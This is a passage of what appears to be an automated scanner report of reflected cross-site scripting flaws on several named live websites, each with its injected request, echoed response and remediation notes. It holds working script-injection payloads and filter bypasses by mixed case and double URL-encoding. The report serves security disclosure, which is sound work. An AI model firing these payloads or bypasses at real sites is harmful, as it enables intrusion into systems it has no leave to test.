The value of the current_page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c15"><script>alert(1)</script>8bd02bd30b0 was submitted in the current_page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jobdetails.asp?current_page=1b8c15"><script>alert(1)</script>8bd02bd30b0&city=&location=&job_type=&emp_status=&direct_jo_num=&country=&k1=&k2=&k3=&k4=&k5=&k6=&k7=&k8=&salary_min=&co_num=&apply=yes&job_number=97 HTTP/1.1
Host: careers.360i.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://careers.360i.com/process_jobsearch.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSRDCSDQ=KBHOBLJCHEKIHMBLKMGMKFPD; __utma=242057309.1697033033.1317923387.1317923387.1317923387.1; __utmb=242057309.9.10.1317923387; __utmc=242057309; __utmz=242057309.1317923387.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 17:51:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Content-Length: 43635
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type
...[SNIP]...
<a href="process_jobsearch.asp?current_page=1b8c15"><script>alert(1)</script>8bd02bd30b0&amp;city=&amp;location=&amp;job_type=&amp;emp_status=&amp;direct_jo_num=&amp;country=&amp;k1=&amp;k2=&amp;k3=&amp;k4=&amp;k5=&amp;k6=&amp;k7=&amp;k8=&amp;salary_min=&amp;co_num=">
...[SNIP]...

1.12. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload e354c<script>alert(1)</script>e54861813bc was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1e354c<script>alert(1)</script>e54861813bc&w=300&h=250 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/COM/iview/334309161/direct;wi.300;hi.250/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-%26redirectURL=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLsQ3CQAwF0B8C6KSsQWspPvsupmAFdnBwXLMIMzEGQ9BTo7z-TRgAXLSlZ6gRZxhpa51MWUlrZDJft0fXgsP99f1NGPdh1uua3GiRNUmqGM3hSe4e3rbQWaTgCCy3ghOGjxecgecbf9eIpIhzAAAA%2526dst%253D
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.623096773.1317661166.1317661166.1317661166.1; __utmz=1.1317661166.1.1.utmcsr=privacy.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/default.mspx

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 06 Oct 2011 17:57:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5640
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
intDivName:"te-clr1-0c3fe785-11b4-4fb1-91ba-923c256fbfba-itl",iconSpanId:"te-clr1-0c3fe785-11b4-4fb1-91ba-923c256fbfba-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att01cont1e354c<script>alert(1)</script>e54861813bc",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_0c3fe785_11b4_4fb1_91ba_923c256fbfba_ib,interstitialWidth:300,interstitialHei
...[SNIP]...

1.13. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload b3e20<ScRiPt>alert(1)</ScRiPt>d25cec59757 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250b3e20<ScRiPt>alert(1)</ScRiPt>d25cec59757&c=att01cont1&w=300&h=250 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/COM/iview/334309161/direct;wi.300;hi.250/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-%26redirectURL=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLsQ3CQAwF0B8C6KSsQWspPvsupmAFdnBwXLMIMzEGQ9BTo7z-TRgAXLSlZ6gRZxhpa51MWUlrZDJft0fXgsP99f1NGPdh1uua3GiRNUmqGM3hSe4e3rbQWaTgCCy3ghOGjxecgecbf9eIpIhzAAAA%2526dst%253D
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.623096773.1317661166.1317661166.1317661166.1; __utmz=1.1317661166.1.1.utmcsr=privacy.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/default.mspx

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 06 Oct 2011 17:57:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5722
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=13&pid=mec01&aid=att01&cid=0311m300x250b3e20<ScRiPt>alert(1)</ScRiPt>d25cec59757&w=300&h=250" target="_blank">
...[SNIP]...

1.14. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 9c64f<ScRiPt>alert(1)</ScRiPt>40d48d42282 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr9c64f<ScRiPt>alert(1)</ScRiPt>40d48d42282 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/COM/iview/334309161/direct;wi.300;hi.250/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwVizEOwDAIA79SMXcADCTpm6Junar.vWbynWy_Ash1ZEDPQ.Dk4W4JmlEEZfBVMRdgWhmxpJfdjXQdbX1zZnaqTmIQ72dvYhEtIv37AXYGFSc-%26redirectURL=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BKwaOoqskJ2oEi5ziKZyWN4iQwR5PVvxgRgKcWzyehkHpVk10Y6TGjbN-bELklzwOX1-dYZ1__w5K01ZerKK0kWplItUY_GNa5DWCTgBpRnwB3TqQEP4H3gB3nT5LZzAAAA%2526dst%253D
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.623096773.1317661166.1317661166.1317661166.1; __utmz=1.1317661166.1.1.utmcsr=privacy.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/default.mspx

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 06 Oct 2011 17:59:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5656
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
clr1_a892e699_00b2_466d_b463_ce06786c4661_bi={baseName:"te-clr1-a892e699-00b2-466d-b463-ce06786c4661",anchName:"te-clr1-a892e699-00b2-466d-b463-ce06786c4661-anch",width:300,height:250,ox:0,oy:0,plc:"tr9c64f<ScRiPt>alert(1)</ScRiPt>40d48d42282",iplc:"rel",intDivName:"te-clr1-a892e699-00b2-466d-b463-ce06786c4661-itl",iconSpanId:"te-clr1-a892e699-00b2-466d-b463-ce06786c4661-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerI
...[SNIP]...

1.15. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload e975f<ScRiPt>alert(1)</ScRiPt>251321d27d3 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002e975f<ScRiPt>alert(1)</ScRiPt>251321d27d3&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/COM/iview/334309161/direct;wi.300;hi.250/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwVizEOwDAIA79SMXcADCTpm6Junar.vWbynWy_Ash1ZEDPQ.Dk4W4JmlEEZfBVMRdgWhmxpJfdjXQdbX1zZnaqTmIQ72dvYhEtIv37AXYGFSc-%26redirectURL=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BKwaOoqskJ2oEi5ziKZyWN4iQwR5PVvxgRgKcWzyehkHpVk10Y6TGjbN-bELklzwOX1-dYZ1__w5K01ZerKK0kWplItUY_GNa5DWCTgBpRnwB3TqQEP4H3gB3nT5LZzAAAA%2526dst%253D
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.623096773.1317661166.1317661166.1317661166.1; __utmz=1.1317661166.1.1.utmcsr=privacy.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/default.mspx

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 06 Oct 2011 17:59:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5656
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
r.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",icon_cam_mo:"http://choices.truste.com/assets/ad_choices_en.png",iconText:"&nbsp;AdChoices",aid:"att01",pid:"mec01",zindex:"10002e975f<ScRiPt>alert(1)</ScRiPt>251321d27d3",cam:"3",cid:"0311m300x250",optoutLink:"http://preferences.truste.com/preference.html?affiliateId=13&pid=mec01&aid=att01&cid=0311m300x250&w=300&h=250",target:"over"};
truste.ca.bindingInitMap[te_clr1_
...[SNIP]...

1.16. http://clients.360i.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clients.360i.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e8d4"><script>alert(1)</script>a8f15f697ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5e8d4"><script>alert(1)</script>a8f15f697ae=1 HTTP/1.1
Host: clients.360i.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242057309.1697033033.1317923387.1317923387.1317923387.1; __utmb=242057309.16.10.1317923387; __utmc=242057309; __utmz=242057309.1317923387.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 17:53:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.1 mod_python/3.2.8 Python/2.4.3
X-Powered-By: PHP/5.3.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"
...[SNIP]...
<form name="login" id="login" action="/?5e8d4"><script>alert(1)</script>a8f15f697ae=1" method="post" onsubmit="return portalFormValidate(this);">
...[SNIP]...

1.17. http://dms.netmng.com/si/cm/tracking/si/CM/Tracking/ClickTracking.aspx [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/cm/tracking/si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 771a6'%3balert(1)//ec4dc3aaa84 was submitted in the u parameter. This input was echoed as 771a6';alert(1)//ec4dc3aaa84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/cm/tracking/si/CM/Tracking/ClickTracking.aspx?siclientid=1331&jscript=1&u=771a6'%3balert(1)//ec4dc3aaa84 HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.360i.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 17:50:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 739
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != '' ||sipageurl.search(/sisearchengine=/i)>=0 ){ if((sipageurl.split('/')[2] != sirefurl.split('/')[2])){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=1331&jscript=0&u=771a6';alert(1)//ec4dc3aaa84';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

1.18. https://events.gsmiweb.com/creditcard_process.php [eventid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /creditcard_process.php

Issue detail

The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a09b0"%3balert(1)//69748930215 was submitted in the eventid parameter. This input was echoed as a09b0";alert(1)//69748930215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /creditcard_process.php?eventid=62a09b0"%3balert(1)//69748930215 HTTP/1.1
Referer: https://events.gsmiweb.com/pastevents.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Accept-Encoding: gzip, deflate

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:45:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6959
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="tex
...[SNIP]...
ert("Enter the Username");
       return false;
   }
   if(document.getElementById("psw").value=='')
   {
       alert("Enter the Password");
       return false;
   }
   
   document.loginfrm.action="member_login.php?eventid=62a09b0";alert(1)//69748930215";
   document.loginfrm.submit();

}

</script>
...[SNIP]...

1.19. https://events.gsmiweb.com/creditcard_process.php [eventid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /creditcard_process.php

Issue detail

The value of the eventid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c556%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbef28f03fc was submitted in the eventid parameter. This input was echoed as 4c556"><script>alert(1)</script>bbef28f03fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the eventid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /creditcard_process.php?eventid=624c556%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebbef28f03fc HTTP/1.1
Referer: https://events.gsmiweb.com/pastevents.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Accept-Encoding: gzip, deflate

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:45:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6989
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="tex
...[SNIP]...
<input type="hidden" name="eventid" id="eventid" value="624c556"><script>alert(1)</script>bbef28f03fc">
...[SNIP]...

1.20. https://events.gsmiweb.com/member_login.php [eventid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /member_login.php

Issue detail

The value of the eventid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2186b"%3balert(1)//29ecd33ee2e was submitted in the eventid parameter. This input was echoed as 2186b";alert(1)//29ecd33ee2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /member_login.php?eventid=2186b"%3balert(1)//29ecd33ee2e HTTP/1.1
Referer: https://events.gsmiweb.com/member_login.php?eventid=
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=508f7787a8b34b47ac085041d2713f9f
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Content-Length: 385
Expect: 100-continue
Accept-Encoding: gzip, deflate

--508f7787a8b34b47ac085041d2713f9f
Content-Disposition: form-data; name="eventid"


--508f7787a8b34b47ac085041d2713f9f
Content-Disposition: form-data; name="uname"


--508f7787a8b34b47ac085041
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6955
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="tex
...[SNIP]...
alert("Enter the Username");
       return false;
   }
   if(document.getElementById("psw").value=='')
   {
       alert("Enter the Password");
       return false;
   }
   
   document.loginfrm.action="member_login.php?eventid=2186b";alert(1)//29ecd33ee2e";
   document.loginfrm.submit();

}

</script>
...[SNIP]...

1.21. https://events.gsmiweb.com/member_login.php [eventid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /member_login.php

Issue detail

The value of the eventid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a26d"><script>alert(1)</script>3be25ad7ab0 was submitted in the eventid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /member_login.php?eventid=5a26d"><script>alert(1)</script>3be25ad7ab0 HTTP/1.1
Referer: https://events.gsmiweb.com/member_login.php?eventid=
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=508f7787a8b34b47ac085041d2713f9f
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Content-Length: 385
Expect: 100-continue
Accept-Encoding: gzip, deflate

--508f7787a8b34b47ac085041d2713f9f
Content-Disposition: form-data; name="eventid"


--508f7787a8b34b47ac085041d2713f9f
Content-Disposition: form-data; name="uname"


--508f7787a8b34b47ac085041
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6985
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="tex
...[SNIP]...
<input type="hidden" name="eventid" id="eventid" value="5a26d"><script>alert(1)</script>3be25ad7ab0">
...[SNIP]...

1.22. https://events.gsmiweb.com/pastevents.php [monthyear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /pastevents.php

Issue detail

The value of the monthyear request parameter is copied into the HTML document as plain text between tags. The payload 16900<script>alert(1)</script>9589fe881f was submitted in the monthyear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pastevents.php?monthyear=November%20201016900<script>alert(1)</script>9589fe881f HTTP/1.1
Referer: https://events.gsmiweb.com/pastevents.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6464
